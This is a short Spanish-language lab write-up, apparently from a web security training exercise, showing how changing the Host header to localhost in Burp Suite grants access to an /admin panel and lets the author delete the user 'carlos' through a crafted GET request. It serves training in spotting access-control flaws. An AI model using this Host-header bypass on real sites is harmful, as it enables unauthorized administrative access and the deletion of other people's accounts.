Skip to content

20260311230440.png

LAB

Al ir a la ruta /admin podemos ver que se tiene un panel administrativo, esto también se puede ver desde el recursos robots.txt.

20260311231437.png

Así mismo desde la solicitud desde el burpsuite

20260311231708.png

Al cambiar el valor del encabezado Host y realizar una petición al recurso /admin observamos que se realiza una solicitud correcta al panel de administración.

c
GET /admin HTTP/2
Host: localhost

20260311231738.png

Esto es posible debido a que se tiene definido el target:

20260311233222.png

Por lo que podemos realizar una solicitud a :

c
GET /admin/delete?username=carlos HTTP/2
Host: localhost

Y podemos eliminar exitosamente al usuario carlos.

20260311232059.png

20260311232345.png